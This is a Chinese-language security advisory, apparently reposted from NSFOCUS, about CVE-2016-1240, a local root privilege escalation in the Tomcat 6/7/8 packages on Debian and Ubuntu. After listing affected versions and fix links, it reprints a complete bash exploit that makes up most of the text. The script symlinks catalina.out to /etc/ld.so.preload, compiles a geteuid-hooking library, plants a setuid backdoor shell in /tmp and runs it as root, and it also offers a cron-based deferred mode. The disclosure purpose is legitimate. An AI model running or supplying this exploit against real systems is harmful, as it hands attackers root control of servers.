2016年9月30日,legalhackers.com網站釋出了一個關于tomcat漏洞的公告,所涉及漏洞的編号為cve-2016-1240。debian系統的linux上管理者通常利用apt-get進行包管理,debian包的一個初始化腳本中存在漏洞,會讓deb包安裝程式自動執行啟動腳本,腳本位置/etc/init.d/tomcatn
攻擊者可以在擁有tomcat低權限的情況下,利用該漏洞獲得系統的root權限。受影響的系統包括debian和ubuntu,其他使用debian包的系統也可能會受影響。
詳情請見以下連結:
http://legalhackers.com/advisories/tomcat-debpkgs-root-privilege-escalation-exploit-cve-2016-1240.html
https://security-tracker.debian.org/tracker/cve-2016-1240
cve-2016-4438
受影響的系統包括debian、ubuntu,其他使用相應deb包的系統也可能受到影響。受影響的debian包如下:
tomcat 8 <= 8.0.36-2
tomcat 7 <= 7.0.70-2
tomcat 6 <= 6.0.45+dfsg-1~deb8u1
tomcat是個運作在apache上的應用伺服器,支援運作servlet/jsp應用程式的容器——可以将tomcat看作是apache的擴充,實際上tomcat也可以獨立于apache運作。
tomcat是由apache軟體基金會下屬的jakarta項目開發的一個servlet容器,按照sun microsystems提供的技術規範,實作了對servlet和javaserver page(jsp)的支援,并提供了作為web伺服器的一些特有功能,如tomcat管理和控制平台、安全域管理和tomcat閥等。由于tomcat本身也内含了一個http伺服器,它也可以被視作一個單獨的web伺服器。
廣義的debian是指一個緻力于建立自由作業系統的合作組織及其作品,由于debian項目衆多核心分支中以linux宏核心為主,而且 debian開發者 所建立的作業系統中絕大部分基礎工具來自于gnu工程 ,是以 “debian” 常指debian gnu/linux。
tomcat安全團隊已經修複了受影響的包,建議使用者更新到最新版本,新版本下載下傳位址如下:
https://sources.debian.net/src/tomcat6/
https://sources.debian.net/src/tomcat7/
https://sources.debian.net/src/tomcat8/
本地攻擊者,作為tomcat使用者(比如說,通過web應用的漏洞)若将catalina.out修改為指向任意系統檔案的連結,一旦tomcat init腳本(root權限運作)在服務重新開機後再次打開catalina.out檔案,攻擊者就可擷取root權限。
<code># run the catalina.sh script as a daemon</code>
<code>set +e</code>
<code>touch "$catalina_pid" "$catalina_base"/logs/catalina.out</code>
<code>chown $tomcat7_user "$catalina_pid" "$catalina_base"/logs/catalina.out</code>
<code>------[ tomcat-rootprivesc-deb.sh ]------</code>
<code>#!/bin/bash # # tomcat 6/7/8 on debian-based distros - local root privilege escalation exploit # # cve-2016-1240 # # discovered and coded by: # # dawid golunski # http://legalhackers.com # # this exploit targets tomcat (versions 6, 7 and 8) packaging on # debian-based distros including debian, ubuntu etc. # it allows attackers with a tomcat shell (e.g. obtained remotely through a # vulnerable java webapp, or locally via weak permissions on webapps in the # tomcat webroot directories etc.) to escalate their privileges to root. # # usage: # ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] # # the exploit can used in two ways: # # -active (assumed by default) - which waits for a tomcat restart in a loop and instantly # gains/executes a rootshell via ld.so.preload as soon as tomcat service is restarted. # it also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up # a tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) # # -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to # /etc/default/locale and exits. it removes the need for the exploit to run in a loop waiting. # attackers can come back at a later time and check on the /etc/default/locale file. upon a # tomcat restart / server reboot, the file should be owned by tomcat user. the attackers can # then add arbitrary commands to the file which will be executed with root privileges by # the /etc/cron.daily/tomcatn logrotation cronjob (run daily around 6:25am on default # ubuntu/debian tomcat installations). # # see full advisory for details at: # http://legalhackers.com/advisories/tomcat-debpkgs-root-privilege-escalation-exploit-cve-2016-1240.html # # disclaimer: # for testing purposes only. do no harm. #</code>
<code>backdoorsh="/bin/bash" backdoorpath="/tmp/tomcatrootsh" privesclib="/tmp/privesclib.so" privescsrc="/tmp/privesclib.c" suidbin="/usr/bin/sudo"</code>
<code>function cleanexit { # cleanup echo -e "\n[+] cleaning up..." rm -f $privescsrc rm -f $privesclib rm -f $tomcatlog touch $tomcatlog if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload 2>/dev/null fi echo -e "\n[+] job done. exiting with code $1 \n" exit $1 }</code>
<code>function ctrl_c() { echo -e "\n[+] active exploitation aborted. remember you can use -deferred switch for deferred exploitation." cleanexit 0 }</code>
<code>#intro echo -e "\033[94m \ntomcat 6/7/8 on debian-based distros - local root privilege escalation exploit\ncve-2016-1240\n" echo -e "discovered and coded by: \n\ndawid golunski \nhttp://legalhackers.com \033[0m"</code>
<code># args if [ $# -lt 1 ]; then echo -e "\n[!] exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n" exit 3 fi if [ "$2" = "-deferred" ]; then mode="deferred" else mode="active" fi</code>
<code># priv check echo -e "\n[+] starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" id | grep -q tomcat if [ $? -ne 0 ]; then echo -e "\n[!] you need to execute the exploit as tomcat user! exiting.\n" exit 3 fi</code>
<code># set target paths tomcatlog="$1" if [ ! -f $tomcatlog ]; then echo -e "\n[!] the specified tomcat catalina.out log ($tomcatlog) doesn't exist. try again.\n" exit 3 fi echo -e "\n[+] target tomcat log file set to $tomcatlog"</code>
<code># [ deferred exploitation ]</code>
<code># symlink the log file to /etc/default/locale file which gets executed daily on default # tomcat installations on debian/ubuntu by the /etc/cron.daily/tomcatn logrotation cronjob around 6:25am. # attackers can freely add their commands to the /etc/default/locale script after tomcat has been # restarted and file owner gets changed. if [ "$mode" = "deferred" ]; then rm -f $tomcatlog && ln -s /etc/default/locale $tomcatlog if [ $? -ne 0 ]; then echo -e "\n[!] couldn't remove the $tomcatlog file or create a symlink." cleanexit 3 fi echo -e "\n[+] symlink created at: \n`ls -l $tomcatlog`" echo -e "\n[+] the current owner of the file is: \n`ls -l /etc/default/locale`" echo -ne "\n[+] keep an eye on the owner change on /etc/default/locale . after the tomcat restart / system reboot" echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges" echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatn log rotation cron. see also -active mode if you can't wait ;)\n\n" exit 0 fi</code>
<code># [ active exploitation ]</code>
<code>trap ctrl_c int # compile privesc preload library echo -e "\n[+] compiling the privesc shared library ($privescsrc)" cat <<_solibeof_>$privescsrc #define _gnu_source #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(rtld_next, "geteuid"); if ( old_geteuid() == 0 ) { chown("$backdoorpath", 0, 0); chmod("$backdoorpath", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ gcc -wall -fpic -shared -o $privesclib $privescsrc -ldl if [ $? -ne 0 ]; then echo -e "\n[!] failed to compile the privesc lib $privescsrc." cleanexit 2; fi</code>
<code># prepare backdoor shell cp $backdoorsh $backdoorpath echo -e "\n[+] backdoor/low-priv shell installed at: \n`ls -l $backdoorpath`"</code>
<code># safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. exiting for safety." cleanexit 2 fi</code>
<code># symlink the log file to ld.so.preload rm -f $tomcatlog && ln -s /etc/ld.so.preload $tomcatlog if [ $? -ne 0 ]; then echo -e "\n[!] couldn't remove the $tomcatlog file or create a symlink." cleanexit 3 fi echo -e "\n[+] symlink created at: \n`ls -l $tomcatlog`"</code>
<code># wait for tomcat to re-open the logs echo -ne "\n[+] waiting for tomcat to re-open the logs/tomcat service restart..." echo -e "\nyou could speed things up by executing : kill [tomcat-pid] (as tomcat user) if needed ;)" while :; do sleep 0.1 if [ -f /etc/ld.so.preload ]; then echo $privesclib > /etc/ld.so.preload break; fi done</code>
<code># /etc/ld.so.preload file should be owned by tomcat user at this point # inject the privesc.so shared library to escalate privileges echo $privesclib > /etc/ld.so.preload echo -e "\n[+] tomcat restarted. the /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] adding $privesclib shared lib to /etc/ld.so.preload" echo -e "\n[+] the /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"</code>
<code># escalating privileges via the suid binary (e.g. /usr/bin/sudo) echo -e "\n[+] escalating privileges via the $suidbin suid binary to get root!" sudo --help 2>/dev/null >/dev/null</code>
<code># check for the rootshell ls -l $backdoorpath | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] rootshell got assigned root suid perms at: \n`ls -l $backdoorpath`" echo -e "\n\033[94mplease tell me you're seeing this too ;) \033[0m" else echo -e "\n[!] failed to get root" cleanexit 2 fi</code>
<code># execute the rootshell echo -e "\n[+] executing the rootshell $backdoorpath now! \n" $backdoorpath -p -c "rm -f /etc/ld.so.preload; rm -f $privesclib" $backdoorpath -p</code>
<code># job done. cleanexit 0</code>
<code>--------------[ eof ]-------------------- </code>
本安全公告僅用來描述可能存在的安全問題,綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的資訊而造成的任何直接或者間接的後果及損失,均由使用者本人負責,綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告,必須保證此安全公告的完整性,包括版權聲明等全部内容。未經綠盟科技允許,不得任意修改或者增減此安全公告内容,不得以任何方式将其用于商業目的。
原文釋出時間:2017年3月24日
本文由:綠盟科技 釋出,版權歸屬于原作者
原文連結:http://toutiao.secjia.com/tomcat-root-privilege-escalation-exploit-cve-2016-1240
本文來自雲栖社群合作夥伴安全加,了解相關資訊可以關注安全加網站
![ubuntu 16.04 源碼安裝httpd和php[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)